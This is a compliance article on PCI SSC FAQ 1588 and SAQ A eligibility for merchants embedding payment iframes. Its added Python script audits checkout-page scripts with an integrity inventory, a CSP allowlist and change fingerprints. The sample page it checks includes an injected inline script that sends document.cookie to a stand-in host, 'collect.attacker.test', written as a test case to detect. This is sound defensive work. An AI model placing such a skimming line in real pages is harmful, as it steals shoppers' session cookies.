The Payment Card Industry Security Standards Council Clarifies Self-Assessment Eligibility for E-commerce Merchants

March 11, 2025


According to an article by the law firm Davis Wright Tremaine, the Payment Card Industry Security Standards Council (PCI SSC) has issued FAQ 1588 to clarify the eligibility criteria for Self-Assessment Questionnaire A (SAQ A). SAQ A lets eligible e-commerce merchants demonstrate compliance with the Payment Card Industry Data Security Standard (PCI DSS) with a reduced set of requirements. The guidance matters most to merchants that outsource payment card processing to PCI DSS-compliant vendors through embedded payment pages, such as iframes, because those merchants still control the page that loads the embedded element.

SAQ A Compliance

The Payment Card Industry Security Standards Council provides 10 self-assessment questionnaires to help merchants and service providers demonstrate PCI DSS compliance efficiently. SAQ A applies to e-commerce merchants that fully outsource payment processing to a PCI DSS-compliant vendor. 

Eligible merchants must not electronically store, process, or transmit cardholder data on their own systems or premises, and must ensure all payment functions are handled by a PCI DSS-compliant third party in one of three ways: a fully hosted e-commerce site, a webpage that redirects customers to the compliant vendor's site for payment, or a webpage that embeds an iframe or similar element served by the compliant vendor.

SAQ A does not apply to merchants handling in-person transactions via a point-of-sale system, and merchants with partial control over payment processing may require SAQ A-EP.

FAQ 1588 addresses a critical eligibility requirement: merchants must confirm their e-commerce site is not susceptible to attacks from scripts that could affect the payment page. The FAQ applies to SAQ A under PCI DSS v4.0.1 (effective April 2025) but is also relevant to earlier versions. It clarifies that this requirement applies only to merchants whose page embeds an iframe or similar element from the vendor, not to merchants that fully redirect customers to the third party's payment page, since a redirecting merchant's own page never hosts the payment form.

To meet this requirement, affected merchants must:

Implement the PCI DSS-defined techniques for managing payment-page scripts, namely an authorized inventory of scripts with integrity assurance (Requirement 6.4.3) and a change- and tamper-detection mechanism for the payment page (Requirement 11.6.1), or obtain confirmation from their PCI DSS-compliant vendor that the embedded element includes protections against script attacks and that the merchant has implemented it according to the vendor's instructions.
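As an added illustration of what the first option looks like in practice (this is editor-supplied example code, not code from the PCI SSC, the law firm, or any payment vendor), the Python script below keeps an authorized script inventory with Subresource Integrity values, audits a checkout page against it, derives a Content-Security-Policy allowlist from the inventory, and fingerprints the page's script set so a scheduled job can detect additions or alterations. The hostnames (www.merchant.test, pay.example-psp.test), file names, script bodies and the checkout page itself are constructed assumptions.

```python
"""Script-inventory audit for a checkout page that embeds a vendor payment iframe.

Added illustration with assumed hostnames and a constructed page; not PCI SSC,
law-firm or vendor code. The checks mirror the techniques the article names
(authorized inventory + integrity, change detection) but do not by themselves
satisfy any SAQ requirement.
"""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit

MERCHANT_ORIGIN = "https://www.merchant.test"   # assumed merchant site
PSP_ORIGIN = "https://pay.example-psp.test"     # assumed hosted-payment vendor


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity value ('sha384-<base64 digest>') for a script body."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


# Constructed script bodies standing in for the files the inventory covers.
CART_JS = b"document.getElementById('total').textContent = window.cartTotal;\n"
PSP_CHECKOUT_JS = b"window.PspCheckout = { mount: function (el) { /* hosted iframe */ } };\n"

# Authorized inventory: each script allowed on the payment page, why it is
# there, and the integrity value approved for it.
AUTHORIZED_SCRIPTS = {
    f"{MERCHANT_ORIGIN}/js/cart.js": {"purpose": "order summary", "integrity": sri_hash(CART_JS)},
    f"{PSP_ORIGIN}/checkout.js": {"purpose": "mounts vendor payment iframe",
                                  "integrity": sri_hash(PSP_CHECKOUT_JS)},
}

# Constructed checkout page: the two authorized scripts plus two that a
# compromised tag manager or plugin might inject (a third-party tag and an
# inline script reading the page).
CHECKOUT_HTML = f"""<!doctype html>
<html><head>
<script src="{MERCHANT_ORIGIN}/js/cart.js" integrity="{sri_hash(CART_JS)}" crossorigin="anonymous"></script>
<script src="{PSP_ORIGIN}/checkout.js" integrity="{sri_hash(PSP_CHECKOUT_JS)}" crossorigin="anonymous"></script>
<script src="https://cdn.tracker-analytics.test/t.js"></script>
<script>fetch('https://collect.attacker.test/c?d=' + document.cookie);</script>
</head><body>
<iframe src="{PSP_ORIGIN}/hosted-form?merchant=demo"></iframe>
</body></html>
"""


class ScriptInventory(HTMLParser):
    """Collect every <script>: external src plus integrity attribute, or inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:      # inside a <script> element
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def inventory(html):
    parser = ScriptInventory()
    parser.feed(html)
    parser.close()
    return parser.scripts


def audit_payment_page(html, authorized=AUTHORIZED_SCRIPTS):
    """(finding, detail) pairs for scripts outside the inventory or whose
    integrity attribute is missing or differs from the approved value."""
    findings = []
    for s in inventory(html):
        if s["src"] is None:
            findings.append(("inline_script", s["body"].strip()))
        elif s["src"] not in authorized:
            findings.append(("unauthorized", s["src"]))
        elif not s["integrity"]:
            findings.append(("missing_integrity", s["src"]))
        elif s["integrity"] != authorized[s["src"]]["integrity"]:
            findings.append(("integrity_mismatch", s["src"]))
    return findings


def csp_header(authorized=AUTHORIZED_SCRIPTS, frame_origin=PSP_ORIGIN):
    """CSP that allowlists only the inventory's script origins and frames only
    the payment vendor, so the browser refuses scripts injected from elsewhere."""
    origins = sorted({f"{urlsplit(src).scheme}://{urlsplit(src).netloc}" for src in authorized})
    return (f"default-src 'self'; script-src {' '.join(origins)}; "
            f"frame-src {frame_origin}; object-src 'none'; base-uri 'self'")


def page_fingerprint(html):
    """Hash of the page's script set; a monitoring job compares the live value
    with the baseline to detect added, removed or altered scripts."""
    rows = [f"{s['src']}|{s['integrity']}|{hashlib.sha256(s['body'].encode()).hexdigest()}"
            for s in inventory(html)]
    return hashlib.sha256("\n".join(rows).encode()).hexdigest()


if __name__ == "__main__":
    for finding in audit_payment_page(CHECKOUT_HTML):
        print(*finding)
    print(csp_header())
```

Two caveats a practitioner should keep in mind. The audit only sees the merchant's own markup; it cannot inspect what runs inside the vendor's iframe, which is exactly why the second path (vendor confirmation) exists. And an integrity attribute only works for scripts whose content is stable; many vendor loaders change without notice and cannot be pinned, so for those the inventory, the CSP allowlist and the fingerprint comparison carry the control instead.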

Merchants should note that the payment brands and their acquirer determine whether a given merchant may validate with SAQ A, based on transaction volumes and other factors. Additionally, merchants that do not fully outsource payment processing may need to use SAQ A-EP, which carries further requirements for protecting the merchant's website.

Takeaways for Risk and Compliance Professionals

Compliance teams must ensure merchants using SAQ A properly assess their script security risks and obtain necessary vendor confirmations. Organizations should review PCI DSS v4.0.1 updates and payment network requirements to determine the most appropriate compliance approach. As regulatory expectations evolve, proactive assessment of third-party payment integrations is essential to maintaining compliance and minimizing security risks.
